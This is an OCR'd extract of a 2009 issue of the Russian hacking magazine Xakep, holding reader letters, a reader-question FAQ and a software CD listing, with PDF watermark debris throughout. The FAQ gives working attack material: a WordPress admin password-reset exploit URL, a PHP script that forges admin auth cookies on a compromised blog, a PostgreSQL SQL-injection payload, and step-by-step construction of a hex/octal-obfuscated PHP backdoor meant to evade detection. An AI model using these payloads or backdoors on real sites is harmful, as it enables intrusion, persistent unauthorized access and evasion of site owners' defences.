книги хакеры / журнал хакер / 129_Optimized
.pdf
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
САМОЕ
ПОЗИТИВНОЕ
ПИСЬМО
НОМЕРА
ОТ: Toinbis Makaroinbis <toinbis@gmail.com>
ТЕМА: ***помощь
Добрийден, Никита, есливынепротив, будуписатпаангелску. [google translate]
Преждевсего— поздравилсЛитвой.
Явыросслитовскимиверсия«Xakep», большиевремена, которое, дажеудалоськупитьanonymizer. com счетспомощьюкредитнойкартынекоторыхпарень, чьеписьмоends@microsoft.com. Netbios ошибоквWindows 98 — многовесельябыло, илиповешениеполовиныкомпьютероввInfoBalt компьютернойконференциис C: \ Con \ Con трюк— спасибовам, все, чтоузналимногополезной удовольствиеотвас, но, вероятно, этосамаяразбудилилюбопытствобылосамоелучшее, чтоя получилотчтения«Xakep» -- онучил, чтовсегдаестьдругойспособсделатьэто, темлучше, ичтоэто удовольствиепытаютсяеенайти. Любознательность, котораяпомогаетнетолькоприрасчете, нои вовсехсферахжизни. Спасибо, ребята! СуществуетоднаскромнаяпросьбапомочьУменя. Делов том, чтомнедействительнонужносвязатьсяsomone, ктознает, кого-тоиз«RISE команда» взломщикиколлектива. Причина, мненужносвязатьсяссостоитвтом, чтобыпредложитьновуюверсию программногообеспечения, ониужедотрещины. Несвязанныестрещинамивариантновойверсии предоставляетсятолькодлякорпоративныхклиентов, такчто, возможно, онибыintereseted сами получитьего... ЛипопытатьсязагрузитьвсесвоитрещиныипроверитьNFOs (30 насегодняшний день...;), ноадресаэлектроннойпочты, ониобеспечиваютЕстьбольшенедействует. Попыткаобъединить# крекерынаFreeNode, нопредложитьтолько.
Почемуянаписаниявами? ПричинаРоссиядаларождениевадмноготалантливыхпрограммистов / хакеров/ крекеров, и, ядумаю, выиликто-товновостях(естьодин? Иливысработыдомой? Просто излюбопытства— работалвкачествежурналистаядовольнодолгоевремя...), возможно, знают некоторыеизних, ионимоглибызнать... тем, чтоцепочкабудетзаканчиватьсяна«Rise КОМАНДА». Пожалуйста, еслиуделатькакие-либотипконтакта, которыйвысчитаете, моглибымнепомочь, ябы оченьпризнательныВамсравняласьсомной. Чтоямогбыобещатьвзамен? Давайтеговоритьотом, чтобысделать10 хорошихвещейвэтоммесяце, чтоможетсделатьмирнемноголучше...
[/google translate]
Спасибозавашевремя, поздравлениеотВилнюс, можитеотвечатпаРуский, Тomas
ПРИВЕТ, ТОМАС!
ПосколькуВолодарскийвежливо отказалсяперевестидлянаствоесообщение, атакжесцельюприведения английскойирусскойчастиписьма кединообразномустилюизложения, мырешиливоспользоватьсяуслугами google translate. Итак, вотчтомы имеемтебесказатьпорезультатам прочтенияданногоперевода. Во-первых, спасибозаписьмо— мы тожевспомнилилитовскуюверсиюz исбольшимудовольствиемперечиталинашистатьи, переведенные налитовскийязык. Мыникогдаине думали, чтонаписанныенамитексты могутвыглядетьстольприкольно(без обид:)). Вашаверсияжурналабыла потоньше, статейвней— поменьше, новсежеэтобылнаш, роднойz. Насчеттвоейпросьбы— сходуответить трудно, посмотримванналах. Кроме того, этописьмобудетопубликованов журнале, поэтому, можетбыть, нужный человектебясаминайдет. Удачи!
САМОЕ ДУРАЦКОЕ ПИСЬМО НОМЕРА
ОТ: 123 123 cl.k@list.ru <alex-rus@live.ru>
ТЕМА: n/a
анасчёттойх**нисостатьямиужизвини, деньгинужныбылиочень, поэтомуповторялся, теперьпонялчтоваснена***еш, ... реально прошуизвененй
Письмо, форварднутоемнепожелавшимостатьсянеизвестным редактором, порадовало. Знакомаяситуация, особеннобылокруто, когдаавторпыталсясдатьГорлустатью, написаннуюсамимже Горлумомпару-тройковмесяцамиранее. Ну, такпрямоисделал— слилегостатьюссайта, особонеразбирался, изменилимяавтора исдалвсеэтохозяйствомногострадальномуредактору. Круче былотолькотогда, когдастудентысдалимнеисторииболезнипо моимжебольным(какаспиранткафедры, яиногдадолженвести студентов), которыенеимелисреальнымибольныминичего общего. Ну, лечилябольнуюотвоспалениялегких— амнестудент счестнымиглазамипредъявляетподэтуфамилиюскачанныйиз инета«передне-распространенныйинфарктмиокарда».
XÀÊÅÐ 09 /129/ 09 |
139 |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
|
X |
|
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
|||
|
|
F |
|
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
|
m |
||||
w |
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
МАГo |
||
|
|
w |
|
|
|
|
|
|
|
|||
|
|
. |
|
|
|
|
|
|
.c |
|
||
|
|
|
p |
|
|
|
|
g |
|
|
||
|
|
|
|
df |
|
|
n |
e |
|
|||
|
|
|
|
|
-xcha |
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
UNITS
/ HTTP://WAP-CHAT.RU /
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
faq
united@real.xakep.ru
Q: ЧтоновенькогоизуязвимостейвWordPress появилосьвпоследнеевремя?
A: НедавнонекийLaurent Gaffie обнаружилв последней(наданныймомент) версии2.8.3 сабжевогодвижкадлясозданияблоговзамечательныйбаг, позволяющийбезкаких-либо подтвержденийсброситьпарольадмина. Если тывнимательночиталмоиэтюдыпровордпресс впредыдущихномерахжурнала, то, наверняка, долженпомнитьоподобномбагевWordPress <= 2.6.1. Тогда(впрочем, какисейчас) багпозволялскинутьпарольадминапривключенной регистрациинаблогеихитрыхманипуляцях собрезаниемпробеловвмускуле. Сейчасже всегораздопроще— регистрацияненужна, ноновыйпароль, какипрежде, узнаеттолько законныйвладелецадминскогомыла. Для
эксплуатациибагатебевсеголишьнеобходимо пройтипоссылкевидаhttp://DOMAIN_NAME. TLD/wp-login.php?action=rp&key[]=. Приэтом парольуспешносбросится:). Работаетфишка тольков2.8.x веткеипроявляетсявследующем кодевwp-login.php:
function reset_password($key) { global $wpdb;
$key = preg_replace( '/[^a-z0-9]/i', '', $key);
if ( empty( $key ) )
return new WP_Error('invalid_ key', __('Invalid key'));
$user = $wpdb->get_row($wpdb ->
prepare("SELECT * FROM $wpdb -> users WHERE user_activation_key = %s", $key));
...
}
Здесь функция prepare() приводит наш массив $key к строковому типу, вследствие чего $key становится пустым и подходит абсолютно для всех записей в таблице пользователей. Как видишь, для этой замечательной уязвимости можно написать массовый эксплойт, который превратит жизнь админов вордпрессовских блогов в хаос. Но, так как практической пользы от этого нехитрого действа для тебя не будет никакой, я не советую заниматься такими пакостями.
P.S. Подробноеadvisory смотрипоссылке http://packetstormsecurity.org/0908-exploits/ wordpress-adminreset.txt.
Q: ВзломалблогнаWordPress. Какбымнетеперь заполучитьадминскиекукинаслучай, еслимой шеллудалят?
A: Механизмгенерациикукисовввордпрессе неизсамыхпростых, но, немногопокуривисходники, можносоставитьнебольшойскрипт, отвечающийзавыводэтихсамыхпресловутых кукиснаэкран:
<?php
include './wp-includes/wp-settings. php';
//ищем секретный ключ из конфига и соль из базы
function wps()
{
global $wp_default_secret_key; $w = $wp_default_secret_key; if(defined('SECRET_KEY') &&
$w != SECRET_KEY) $secret_key = SECRET_KEY; if(defined('AUTH_KEY') &&
$w != AUTH_KEY) $secret_key = AUTH_KEY;
$salt=get_option('auth_salt'); if(empty($salt))
$salt = get_option('secret'); return $secret_key.$salt;
}
//функция генерирует авторизационные кукисы
function auc($u = 'admin')
{
global $wp_version;
$s = ($wp_version != '2.5'') ? '|' : '';
$t = 2107184816;
return $u.'|'.$t.'|'.hash_ hmac('md5', $u.$s.$t,hash_ hmac('md5',$u.$s.$t,wps()));
}
//выводим на экран
print AUTH_COOKIE.'='.auc(); ?>
140 |
XÀÊÅÐ 09 /129/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Кодвыведетдлятебягодныевтечение10 лет кукипользователяadmin.
Q: НашелSQL-инъекциювдвижке, которыйиспользуетPostgreSQL, ноникакнемогуполучить доступкбазеInformation_schema. Незнаешь, в чемдело?
A: Вероятней всего, тебе попалась старая версия PostgreSQL, в которой попросту не существовало Information_schema. К счас-
тью, в то время было некое жалкое подобие этой базы под названием PG_TABLES. Как следует из названия, отсюда мы сможем узнать только таблицы, но никак не колонки (их придется подбирать вручную). Итак, исходя из того, что здесь названия таблиц хранятся в колонке TABLENAME, можно составить примерный запрос для эксплуатации твоей скули:
http://www.site.com/postgre. php?id=-999 union select TABLENAME,null,null,null,null from PG_TABLES limit 1 offset 0--
Q: Хочусоздатьсвойстартап, нонужнакакая-ли- бооригинальнаяидея. Отсюдавопрос: какиезападныестартапысчитаютсясамымиуспешными винтернете?
A:Еслиисходитьизформата«Top 10», томожно выделитьследующиемегауспешныевеб-стар- тапыпоследнихнесколькихлет:
1.MySpace (http://www.myspace.com), социаль-
наясеть, основанавиюле2003 года;
2.YouTube (http://www.youtube.com), видеохос-
тинг, основанвфеврале2005 года;
3.Facebook (http://www.facebook.com), соци-
альнаясеть, основанавфеврале2004 года;
4.Wikipedia (http://www.wikipedia.org), wikibased энциклопедия, январь2001;
5.Bebo (http://www.bebo.com), социальная сеть, январь2005 года;
6.Digg (http://www.digg.com), социальнаясеть новостей, ноябрь2004 года;
7.Flickr (http://www.flickr.com), фотохостинг,
февраль2004;
8.Netvibes (http://www.netvibes.com), твоя стартоваястраницаинтернета, сентябрь2005;
9.Del.icio.us (http://del.icio.us), социальные закладки, конец2003 года;
10.Meebo (http://www.meebo.com), онлайн-
мессенджер, сентябрь2005 года.
Каквидноизвышеприведенногосписка, все самыелакомыеидеиизегоначалаужезаняты русскимистартаперами. Конецжеспискавполнесвободендлярунета. Такчто, действуй:).
Q:СделалкартуVISA насервисеEpassporte.
com. Всемдоволен, кромемизерноголимитана снятиеденегвбанкоматах— 320 баксоввдень. Какподнятьэтотлимит?
A:Еслитынехочешьпользоватьсямудреными инструкциямипоувеличениюлимитовсамого епасса(пунктменю«Increase your limits» в
админке), тосоветуювоспользоватьсясерви-
сомePayService (http://www.epayservice.ru),
которыйпредлагаетсвоимклиентамполучить картуVisa Electron ePassporte сизначально установленнымдневнымлимитомнаснятие наличностидо$25.000.
Для открытия счета в ePassporte с помощью сайта необходимо, чтобы на твоем счету в EPS Banking Online находилась сумма не менее $50 ($10 уже будет у тебя на карте). Стоимость открытия счета зависит от дневного лимита на снятие наличности по карте ePassporte и может составлять от $50 до $300 в зависимости от дневного лимита ($520-$25.050). Сроки изготовления карты
— 10-14 рабочих дней; сроки доставки: курьерской почтой (+$100) 3-4 рабочих дня, обычной почтой — около 3-х недель.
Q:Подскажи, какимобразомможнонадежней всегооставитьсвойбэкдорнасайте, движок которогонаписаннаphp? Способсeval(base64_ decode()) ужеоченьхорошопалится.
A:Действительно, найтизлонамеренныйкод, вызываемыйчерезфункциюeval, всвоих скриптахпрощепростого(например, можно использоватьвсемилюбимыйgrep eval ./*). Поэтомупытливыеумыхакеровпридумывают всеновыеиновыеспособыхитрогоинжекта бэкдороввphp-скрипты.
Итак, сначаланемноготеории. Какты, наверняка, ужезнаешь, замечательнаяфункция preg_replace() позволяетвыполнятьлюбойкод спомощьюмодификатора«e»:
<?php preg_replace('@(.+)@ ie',"\\1",'phpinfo();'); ?>
Этанехитраярегуляркавполнеуспешно выведетнатвойэкранрезультатвыполнения функцииphpinfo(). Теперьзададимсявопросом: почемубынамнесконструироватьсвойбэкдор спомощьюpreg_replace()? Сделатьэтоможно, например, так:
<?php preg_replace('@(.+)@ie',
'eval("\\1");', '$_REQUEST[cmd]’);
?>
Кодбудетвыполнятьлюбуюphp-конструкцию, переданнуювскриптспомощьюпараметра cmd. Кпримеру, тактысможешьвывестина экранphpinfo():
http://site.com/backdoor.php?
cmd=phpinfo();
Вэтомспособевсехорошо, крометого, чтоон замечательнопалитсяиз-заналичиямодифи- катора«e» ивызоваeval. Конечно, можноэто делозамаскироватьспомощьютогожеbase64, нополученныйкодвсеещебудеточеньподозрительнымикрайнелегкимдлярасшифровки. Здесьнельзяневспомнитьособенностьphp, котораязаключаетсявтом, чтошестнадцатеричные(hex) ивосьмеричные(oct) символы можноиспользоватьвкачествепараметров функцииипростовкачествеальтернативного способанаписаниялюбыхстрок(использовать этисимволынеобходимовдвойныхкавычках). Привожупримерфункции, котораязакодирует любуюстрокувнужноенампредставление (причем, hex иoct будутчередоватьсядля усложнениядешифровкистроки):
function str2hexoct($str)
{
$str2hex = urldecode($str); $returnstr='';
for($i=0;$i<strlen($str);$i++)
{
$hex=dechex(ord($str[$i]));
if($i % 2 != 0)
{
$hex=base_convert( $hex, 16, 8);
$returnstr .= "\\$hex";
}
else
$returnstr .= "\\x$hex";
}
return $returnstr;
}
Теперьзаюзаемэтуфункциюдляшифровкивышеприведенныхаргументовфункции preg_replace():
<?php
function str2hexoct($str)
{
...
}
XÀÊÅÐ 09 /129/ 09 |
141 |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
|
X |
|
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
|||
|
|
F |
|
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
|
m |
||||
w |
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
МАГo |
||
|
|
w |
|
|
|
|
|
|
|
|||
|
|
. |
|
|
|
|
|
|
.c |
|
||
|
|
|
p |
|
|
|
|
g |
|
|
||
|
|
|
|
df |
|
|
n |
e |
|
|||
|
|
|
|
|
-xcha |
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
UNITS
/ HTTP://WAP-CHAT.RU /
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
$my_code = 'preg_replace("'. str2hexoct('@(.+)@ie').'","'.st r2hexoct('eval("\\1");').'","‘. str2hexoct('$_REQUEST[cmd]').'");'; print $my_code;
?>
Послевыполненияскриптвыведетнаэкран следующеезначение, котороевполнеуспешно можноюзатьдлябэкдоровбезвсякихeval и base64:
preg_replace("\x40\50\x2e\53\ x29\100\x69\145", "\x65\166\ x61\154\x28\42\x5c\61\x22\51\x3b", "\x24\137\x52\105\x51\125\x45\123\ x54\133\x63\155\x64\135");
Каквидишь, теперьвсеаргументынашейфункциизашифрованывhex иoct представлении. Кстати, своюработоспособностьотэтогоонане потерялаивсетакжевыполнитдлятебялюбой php-кодчерезпереданныйскриптупараметр cmd :)
Q: СлышалосозданиинейроннойсетипораспознаваниюкапчинаJavaScript. Гдеможноузнать обэтомпоподробней?
A:Действительно, некийShaun Friedle написалнаобычномjavascript OCR-модуль дляраспознаванияcaptcha насервисе megaupload.com. Модульпредставляетсобой искусственнуюнейроннуюсетьдляработыс картинкамиспомощьюHTML 5 js-функции getImageData. Посмотретьпримерработыи прочитатьтехническиедеталиможноздесь: http://herecomethelizards.co.uk/mu_captcha,
аисходныйкодскриптанаходитсяпоадресу http://userscripts.org/scripts/review/38736.
Q:Естьнеобходимостьтранслироватьвидео(например, свеб-камеры) винет. Враспоряжении естьсервер. Каклучшеэтореализовать?
A:Насамомделе, вариантовмножество. Если братьконкретныепрограммныепродукты дляорганизациивеб-трансляции, тосоветую взглянутьвсторонуwebcamXP Pro (http:// www.webcamxp.com), VLC (www.videolan.org/ vlc) ичрезвычайномощногоWowza Media Server (http://www.wowzamedia.com). Можно такжепопробовать: ffserver (http://ffmpeg. org/ffserver-doc.html), camserv (http://cserv. sourceforge.net), webcam-server (http:// webcamserver.sourceforge.net).
Однимизсамыхпрактичныхвариантов, пожалуй, являетсятрансляциявидеочерезFlashплеер— втакомслучаесвоспроизведениемне будетпроблемубольшинствапользователей. Реализоватьможноспомощьюдвухпродук-
тов: Adobe Flash Media Encoder (http://www. adobe.com/products/flashmediaencoding) и Adobe FMS (http://www.adobe.com/products/ flashmediaserver/flashmediaencoder). Тожеса-
моевполнереальноорганизоватьспомощью опен-сорсногопродуктаRed5 (http://osflash.
142
org/red5). Особенноприятно, чтовидеовэтом случаеможнотранслироватьснескольких камеродновременно.
Q: Яхочутранслироватьвинетвидеосмоей веб-камеры. Какэтосделатьбезсобственного сервера?
A:Самыйпростойвариант— заюзатьспециальныесервисыдляорганизациитрансляции. Такойфункционалестьнаsmotri.com, rutube.ru иyatv.ru. Последний, кстати, покамалонагруженибуквальнолетает.
Q:Слышал, естьнекийкитайский«офис» — полныйклонпродуктаотMS. Гденайти?
A:Да, сделатьполныйклонидатьвозможность клиентамприобрестиболеедешевыйпродукт
— былоглавнойзадачейпрограммистов
ElOffice (http://www.evermoresw.com). Проект разрабатывается9 лет, написаннаJava, есть версиидляWindows, Linux иSymbian OS. Име-
етсябета-версиядляработывонлайнечерез браузер.
Q: ЕстьливWindows аналогкомандыuname, чтобыбыстроопределитьверсиюсистемы? Ато, бывает, получишьдоступкcmd.exe, аопринадлежностихостактойилиинойОСприходится судитьпокосвеннымпризнакам.
A: Такаякомандаесть: ver. Например, наофисномкомпьютере«Геймленда» командавыдает:
C:\usr>ver
Microsoft Windows XP [Версия 5.1.2600]
Этоозначает, чтовкачествеоперационки используетсяWindows XP
Q: Яживувпровинции, гдедосихпоринеттарифицируетсяпотрафику, абезлимитныхтарифов поадекватнымценамнет. Ивсебыничего, если быненеобходимостьобщатьсясработодателем (яфрилансер) поSkype. Этазаразажретчертовскимноготрафика, дажееслизвонкинепосредственнонеосуществляются. Ведьестьжеаналог, носменьшимпотреблениемтрафика?
A:Да, действительно: Skype можетиспользоватьчастьполосытвоегоканалавлюбое время, когдаонзапущен. Благодаряэтому удаетсяобеспечитьсвязьналюбыхкомпьютерах, даженаходящихсязаNAT. Увы: страдают те, укогокаждыймегабайтпо-прежнемуна счету. Вкачествеальтернативыможнопопро- боватьVoIP-сервисnonoh.net. Клиент, конечно, серьезнопроигрываетпоудобствуSkype, но затоотличаетсяминимальнымпотреблением трафикаибесплатнымизвонкамивомногие страны, авРоссии— вМосквуиПитер.
Q:ПоставилCentOS, нообратитьсякмоимслужбамLDAP никтонеможет. Какэтоисправить?
A:Деловтом, чтоконфигурацияIptables всис-
темах CentOS / Red Hat / RHEL / Fedora Linux не позволяетосуществитьвходящиесоединения
кслужбамLDAP. НужнооткрытьпортыTCP #389 иTCP # 636, добавивследующиестрочкив/etc/ sysconfig/iptables:
-A RH-Firewall-1-INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 389 -j ACCEPT
-A RH-Firewall-1-INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 636 -j ACCEPT
Затемнеобходимообновлениеслужбыiptables
командой«service iptables reload». Послеэтого подключениебудутприниматьсяотовсехкомпьютеровизподсети192.168.1.0/24.
Q: ЕстьнесколькоконфиговвXML, гдевседанныенаписаныоднойстрокой. Подскажи, естьли способавтоматическиотформатироватьфайлы так, чтобыпоявилисьотступывсоответствиисо вложенностьюэлементов?
A: Чтобыпревратитьнепонятнуюкашув опрятныйXML-файл, можновоспользоваться готовымXSL-преобразованием:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.
w3.org/1999/XSL/Transform»> <xsl:output method="xml"/> <xsl:param name="indent-increment" select="' '" />
<xsl:template match="*"> <xsl:param name="indent"
select="' '"/>
<xsl:value-of select="$indent"/> <xsl:copy>
<xsl:copy-of select="@*" /> <xsl:apply-templates>
<xsl:with-param name="indent" select="concat($indent,
$indent-increment)"/> </xsl:apply-templates> <xsl:value-of select="$indent"/>
</xsl:copy>
</xsl:template>
<xsl:template match="comment()|processinginstruction()">
<xsl:copy /> </xsl:template>
<!-- WARNING: this is dangerous. Handle with care --> <xsl:template match="text()[normalizespace(.)='']"/>
</xsl:stylesheet>
ПрименитьXSL-преобразованиекXML-файлу можноспомощьюутилитыxmlstarlet (http:// xmlstar.sourceforge.net). z
XÀÊÅÐ 09 /129/ 09
>>WINDOWS |
|
HandyCache RC1 1.0.0.64 |
|
Gammu 1.25 |
|
>Security |
>Dailysoft |
|
JDownloader 0.7 |
|
GIMP 2.7.0 |
|
AIDE 0.13.1 |
7-Zip 4.65 |
|
NetLimiter 2 Pro |
|
GNOME 2.26.3 |
|
Arpwatch |
AIMP 2.51 |
|
Opera 10 |
|
GNOME Commander 1.2.8.1 |
|
BleachBit 0.6.3 |
Autoruns for Windows 9.53 |
|
oPERA mINI Proxy v0.3.2 |
|
Google Gadgets 0.11.0 |
|
Dhcdrop 0.5 |
DAEMON Tools Lite 4.30.4 |
|
Pidgin-Encryption 3.0 |
|
Griffith 0.10 |
|
Ethereal 0.99.0 |
Download Master 5.5.12.1173 |
|
Seesmic Desktop 0.5 |
|
LinuxSampler 1.0 |
|
Fiked 0.0.5 |
Far Manager 2.0 |
|
Trillian Astra 4.0 |
|
Mixxx 1.7.0 |
|
Firestarter 1.0.3 |
FileZilla Client 3.2.7-rc1 |
|
USB Webserver 7.0 |
|
OpenOffice.org 3.1.1 |
|
Hyenae 0.32-1 |
K-Lite Mega Codec Pack 5.0.5 |
|
|
|
PeaZip 2.6.3 |
|
IPTraf 3.0.0 |
Miranda IM 0.8.5 |
|
>Security |
|
Scalpel Sound Editor 0.5.0 |
|
Listp 1.3 |
Mozilla Firefox 3.5.2 |
|
BCWipe 3.11.7 |
|
Shutter 0.80.1 |
|
Logdigest 0.2.3 |
Notepad++ 5.4.5 |
|
BleachBit 0.6.3 |
|
Viewnior 0.6 |
|
Logwatch 7.3.6 |
Opera 10.00 |
|
DiskCryptor 0.8 |
|
Wally 2.1.0 |
|
Mausezahn 0.34.9 |
PuTTY 0.60 |
|
Hyenae 0.32-1 |
|
Xara LX 0.7 |
|
Netifera 1.0 |
QIP 2005 Build 8095 |
|
IBM Rationa Appscan 7.8 |
|
|
|
Pyrit 0.2.4 |
Skype 4.04.0 |
|
OSSEC v2.2 beta1 |
|
>Devel |
|
Samhain 2.5.8 |
Total Commander 7.04a |
|
PREDATOR 1.1 |
|
Botan 1.8.6 |
|
Scanlogd 2.2.6 |
Unlocker 1.8.7 |
|
Secunia Personal Software Inspector |
|
Diffuse 0.4.0 |
|
Sqlmap 0.7 |
Xakep CD DataSaver 5.2 |
|
(PSI) 1.5.0.1 |
|
Distcc 3.1 |
|
Tor Navigator 0.0.1 alpha |
XnView 1.96.2 |
|
|
|
Eclim 1.5.2 |
|
Tripwire 2.4.1.2 |
|
|
Инструменты для пентеста веб- |
|
Fasm 1.68 |
|
|
>Development |
|
приложений: |
|
Geany 0.18 |
|
>Server |
Immunity Debugger |
|
Acunetix Web Security Scanner Free |
|
Jailer 3.1.6 |
|
389 Directory Server 1.2.2 |
IntelliJ IDEA 9 Milestone 1 |
|
bsqlbf 2.3 |
|
jCryption 1.0 |
|
Apache 2.2.13 |
octalforty Componento 1.0 Alpha 1 |
|
Burp Suite 1.2.01 |
|
KDevelop 3.5.5 |
|
Cups 1.4.0 |
Parrot 1.4.0 |
|
HP WebInspect Evaluation |
|
libjpeg v7 |
|
DHCP 4.1.1b2 |
Windows 7 Training Kit For |
|
IBM Rationa Appscan 7.8 |
|
libpng 1.2.39 |
|
Embedthis Appweb 3.0.0 |
Developers |
|
Nikto 2.03 |
|
libtiff 3.9.1 |
|
llcon 3.0.1 |
|
|
Plugins |
|
Meld 1.3 |
|
MySQL 5.0.85 |
>Games |
|
Paros 3.2.13 |
|
Monster 0.13 |
|
Nagios 3.2.0 |
Hedgewars 0.9.11 |
|
ProxyStrike 2.2 |
|
Moonlight 2.0 Beta |
|
OpenSSH 5.2 |
|
|
sqlmap 0.7 |
|
Padre 0.41 |
|
OpenVPN 2.0.9 |
>Misc |
|
sqlsus 0.4 |
|
Perl 5.10.1 |
|
Opsview 3.3.0 |
BatteryCare 0.9.7.1 |
|
Wapiti 2.1.0 |
|
PySide 0.1.4.5 |
|
PacketFence 1.8.4 |
CCCCtrlC |
|
XSpider 7 demo |
|
SmartSVN 6.0.5 |
|
Postfix 2.6.4 |
Client for Google Translate 3.1.83 |
|
|
|
Valgrind 3.5.0 |
|
Puppet 0.24.8 |
ClipX 1.0.3.9 beta |
|
Площадка для тренировки взлому: |
|
Wing IDE 3.2.0 |
|
RabbIT 4.2 |
